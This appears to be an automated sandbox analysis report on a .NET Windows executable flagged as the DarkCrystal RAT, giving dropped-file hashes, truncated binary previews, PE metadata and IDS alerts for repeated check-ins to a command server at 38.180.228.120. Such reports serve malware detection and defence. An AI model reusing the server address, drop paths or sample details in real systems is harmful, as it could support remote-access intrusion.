                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\zdNKrvXu.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\zlxdWeyz.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\jones\OneDrive\0b77faa1f189a8

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (901), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):901
                                                  Entropy (8bit):5.909741998396687
                                                  Encrypted:false
                                                  SSDEEP:12:NmMcjlyBfLYrNlc13nP1EG1mc/gnFtR272rC4Q09pAT9LpfmrQNCYpytTVomMoOt:G5yBf1XPzMnFteon96T9LOmCDVoa/R4
                                                  MD5:083433C8E375F9075CC1912A2E43DE62
                                                  SHA1:6508FBD9569AAC112E8277585376FF818BE619E9
                                                  SHA-256:33FB51A3057CDD92C42784FFD5B78A33A10074E7B0A1F2D8893A968BD46CEE5B
                                                  SHA-512:4B423BA31A035FB9098C99360040FB1709BF65EEB2B77A5FA1D5DF9B722112DD644FC55FB09A7D5C93DD40888500642F414BB71D098C6FDE4F576CC9CD5202ED
                                                  Malicious:false
                                                  Preview:dej2nbEslqEJzO47MEwXmPgj9lqKbLcXYtc5WPFPkZW9hiULdLkWAQRO892Bu3RZOqvGw8k79hxN3gBbQeqPkGXIbO7XXDeqI6v0xOZelnWdcEVb8auQMBzITnoiBNj5CHF6vKoCFMo6t4pX2fY6SOdGHnhKj1dXDbbV9YqywsKAX2YZ7Rpfznmxo8zIndcNtQ3ScUYdzjJkEcsPOHMSL7iaynrAjiLSQ6RH9G6m2LqPeCtLQk4fRJCvrddynX4RY0UHLlQHLkZAQT5v4fu9nqBG4fZfmH9eQY0oslAoUwUquBeYhs4Hn5nsyNMpMueDl4t2dRDTfFo1VVW3AB84N11VvHzeZUckSRFzRm5QolmhQwWd1ToLwjztDYHVci3KnEjEPglXGsPmPTE8vWnFpRxsbWv3fjyGrb4LMSOUsQEEUMetTIkF4yeWQ1m3ur2g4J5xZ3vcISXYMtXP1CkX9sL26i5VpUjAYiJLQrUaWH7maFJgdXBsHfgL7C017axxtXAojM8KsKA2ujc0YY2RS033B7NO0cc6TK2DFf6QZ1A6eobXkAcjhge2dGmm9uTPsEikqYv2bm2a06ZWgzn0A2YxpAj82UQpivOZF1qLOjI5nDBgrQFJGdOzqv4qzwAGVM2Es9QoIclatcJl8CRmPHiFgYtU7AWcjBkbL7ys9aAo1yGOlSrwfX1NnxiUQ6rIGI0r1saBOinyG4NrSesoSj7LKXxXZdbCt2is8YW31qi6uCHtj0CvOCzgLohe5CmuHkFOWet4HyxmAAbIQDyibpyqDBhT028yDyzJ72XEHInZPMgKNZO1ODSbwYKU7ZDP08iMLRKXqtbTBYb0fWGboGjAfXWirCGsEYjQnU85O0Lfm9ZY7UzlSlktYiqx5mpomtOnz

                                                  C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@.................................`.,.K.... ,.p....................@,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@....reloc.......@,.......+.............@..B..................,.....H...........H.......n......./!...,......................................0..........(.... ........8........E........*...9.......8....*(.... ....~d...{....:....& ....8....(.... ....8....(.... ....~d...{s...:....& ....8........0.......... ........8........E....5...).......E...........80...8*... ....~d...{....:....& ....8....r...ps....z*...... ....8........~....(]...~....(a... ....?.... ....~d...{m...:h...& ....8]...~....(U... .... .... ....s....~....(Y....... ....8'...~....9o..

                                                  C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Windows\ShellExperiences\0b77faa1f189a8

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (722), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):722
                                                  Entropy (8bit):5.884509235280514
                                                  Encrypted:false
                                                  SSDEEP:12:mNCiVlR0u/wyV7gDXCbtLY1j2mn8km1hOND9W2Eo5866buzNCsd5NraVHgeoZtfj:mQsldwyxgDXCb5Y1j2a8xnONT66EuzNl
                                                  MD5:A0539983DC393D8C75D6585BD4E91106
                                                  SHA1:752A18DAE8FD6A461372D9730545AC3B488101A7
                                                  SHA-256:A50AD5F8E6CF165549F3DA4D3F36D7F7CC3A506CEB3FEE3470EAB528111BED17
                                                  SHA-512:E3866AEE432F211B38D9D199DA387FFB34C22A90536CD38F00549DCF644BA4FCCE50039F00197214725625264A107DD161FBC6568AA18A988AC9DEC2FCDC449E
                                                  Malicious:false
                                                  Preview:tZgoiaqSccVPddFiZNTgiGpsVMLQCud2XnEY2Ih3XDhW2Qb2TufPaqKntxTWPaPr9c10YrpQqaIfiS0EuT6RPNcrcboFzKo6x0XZYldmFOiAhpFb7Om5e7bv9KX7CkagvLrs4aqIzTMApcJxVNIlisc0ZmZNOgjfxCOW8XgghdFKuaGhBjlzbz7Ds0TSBc4TurMmOxz8rlDFmSF8g2Mp4uD8ELnHENfEiwZDNdTOumHzv2aZuUwIQPY9nOhDKr4eG8g03CvCj74RnNMMvNXtbWxTYaZ85PECsntxWkgsitjTUGWaCVS6UKCuKMccmwHT32j9eZ0LqpKrxe9RD96k7Hshk9mJHDFwmPZchX5mfHQp9V7qNKZmzgVwKBZfxrDmjYEhFhtqDUE01DiPB657od6F4nRf7azyEnFlQakqatifcf4GdKd0vF8Fb9mbPNsmeQwN768lVPg44bnYsLCx78C8pAJRxIbNA5BLsrJgL1fgjDLAVNtEL4pfNyh7xryMxT48ZcqABfmGcgYmyI5jZXBGQf74KMsdCTsQJMl3hsCpRiCrZ4IpwPxaRxs4ev0zwJEJxIdmhBBqUWyscPfQDDrwgS9VdrYw2N2Ie33QafIuOGF59AbOPjvtcRnfJII0nOxHdpNjWOzi56iZMEWdPJgSbJqMPXHSWSH9T8bTw12BuMxftNTFwpkdsepU8BU8GhLnziGOmCrYQfiOVL

                                                  C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@.................................`.,.K.... ,.p....................@,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@....reloc.......@,.......+.............@..B..................,.....H...........H.......n......./!...,......................................0..........(.... ........8........E........*...9.......8....*(.... ....~d...{....:....& ....8....(.... ....8....(.... ....~d...{s...:....& ....8........0.......... ........8........E....5...).......E...........80...8*... ....~d...{....:....& ....8....r...ps....z*...... ....8........~....(]...~....(a... ....?.... ....~d...{m...:h...& ....8]...~....(U... .... .... ....s....~....(Y....... ....8'...~....9o..

                                                  C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  \Device\Null

                                                  Download File
                                                  Process:C:\Windows\System32\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):502
                                                  Entropy (8bit):4.6103462178019665
                                                  Encrypted:false
                                                  SSDEEP:12:PR45pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:JKdUOAokItULVDv
                                                  MD5:7F48CA448373AA5F29388ECD8774273A
                                                  SHA1:752382BEB77E9571198056440BC31E38794E742B
                                                  SHA-256:45C2AAF408A9D5F26552732E3B911AB00D2D579736FA6F18E6B3DA7563F722A7
                                                  SHA-512:4A18F00254BA4958EC3D4ED81B4E8CA87DE73F84FAF70EBFA639D051AD79C7C48AD4A12C702A18047D3DC2D9105BAAC562E5B9857CA5CFED32E335CF061533A7
                                                  Malicious:false
                                                  Preview:..Pinging 878411 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.745071784980981
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:KPFv8ATDx0.exe
                                                  File size:2'882'048 bytes
                                                  MD5:3ff58b353cd7e1b70eb300561e146e6c
                                                  SHA1:d9059f5389fad25f1bf44b7332c018f806159df9
                                                  SHA256:15892ecb245a5c3aa1ab94d60ed1d034540b14623bdc6f27acfa1f0a5791ed33
                                                  SHA512:7f2e55642cb0229c5f0bba1a6c7930855258b3fbee3ab033d1802c157c4afec02750b1b7339afeb7e0bc265fe452d94d7d9826bcf28dc657496df0be43e6e935
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  TLSH:D1D5D08696628F32C2B57F3A84DB502D52E0C776B622FF1F391F1095A9163349B062F7
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@................................

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x6c10ae
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2c10600x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c20000x370.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c40000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x2bf0b40x2bf2007eafd7587854d996188a540cead5750eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x2c20000x3700x4008be70b6e7482777556a4e41300d7a70bFalse0.3759765625data2.86187496601071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .reloc0x2c40000xc0x200867bbcbcdacc7ed8cf18a6937b39ac73False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 ","0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x2c20580x318data0.44823232323232326

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-19T18:52:22.583859+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74974238.180.228.12080TCP
                                                  2024-11-19T18:52:35.443182+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74982238.180.228.12080TCP
                                                  2024-11-19T18:52:46.099413+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74988238.180.228.12080TCP
                                                  2024-11-19T18:52:59.865009+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74996238.180.228.12080TCP
                                                  2024-11-19T18:53:10.833745+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74997538.180.228.12080TCP
                                                  2024-11-19T18:53:23.318092+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74997638.180.228.12080TCP
                                                  2024-11-19T18:53:33.489962+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74997738.180.228.12080TCP
                                                  2024-11-19T18:53:46.146219+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74997838.180.228.12080TCP
                                                  2024-11-19T18:53:59.315380+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74997938.180.228.12080TCP
                                                  2024-11-19T18:54:09.443063+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998038.180.228.12080TCP
                                                  2024-11-19T18:54:20.864944+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998138.180.228.12080TCP
                                                  2024-11-19T18:54:30.271239+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998238.180.228.12080TCP
                                                  2024-11-19T18:54:41.865014+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998338.180.228.12080TCP
                                                  2024-11-19T18:54:51.099420+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998438.180.228.12080TCP
                                                  2024-11-19T18:55:02.443241+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998538.180.228.12080TCP
                                                  2024-11-19T18:55:14.615047+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998638.180.228.12080TCP
                                                  2024-11-19T18:55:24.693634+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998738.180.228.12080TCP
                                                  2024-11-19T18:55:35.287033+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998838.180.228.12080TCP
                                                  2024-11-19T18:55:46.880784+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74998938.180.228.12080TCP
                                                  2024-11-19T18:55:58.455712+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74999038.180.228.12080TCP
                                                  2024-11-19T18:56:08.708973+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74999138.180.228.12080TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 19, 2024 18:52:21.875355959 CET4974280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:21.880968094 CET804974238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:21.881050110 CET4974280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:21.881669998 CET4974280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:21.887274027 CET804974238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:22.241193056 CET4974280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:22.246102095 CET804974238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:22.530540943 CET804974238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:22.583858967 CET4974280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:22.662048101 CET804974238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:22.708842039 CET4974280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:22.967315912 CET4974280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:34.761512041 CET4982280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:34.766453028 CET804982238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:34.766529083 CET4982280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:34.766849041 CET4982280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:34.771585941 CET804982238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:35.236293077 CET4982280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:35.241226912 CET804982238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:35.389852047 CET804982238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:35.443181992 CET4982280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:35.520869017 CET804982238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:35.568167925 CET4982280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:35.992762089 CET4982280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:45.427942038 CET4988280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:45.432849884 CET804988238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:45.433713913 CET4988280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:45.433948040 CET4988280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:45.438752890 CET804988238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:45.787472010 CET4988280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:45.792789936 CET804988238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:46.052722931 CET804988238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:46.099412918 CET4988280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:46.184705019 CET804988238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:46.224410057 CET4988280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:46.449150085 CET4988280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:59.164016962 CET4996280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:59.168958902 CET804996238.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:52:59.171757936 CET4996280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:59.172427893 CET4996280192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:52:59.177222013 CET804996238.180.228.120192.168.2.7
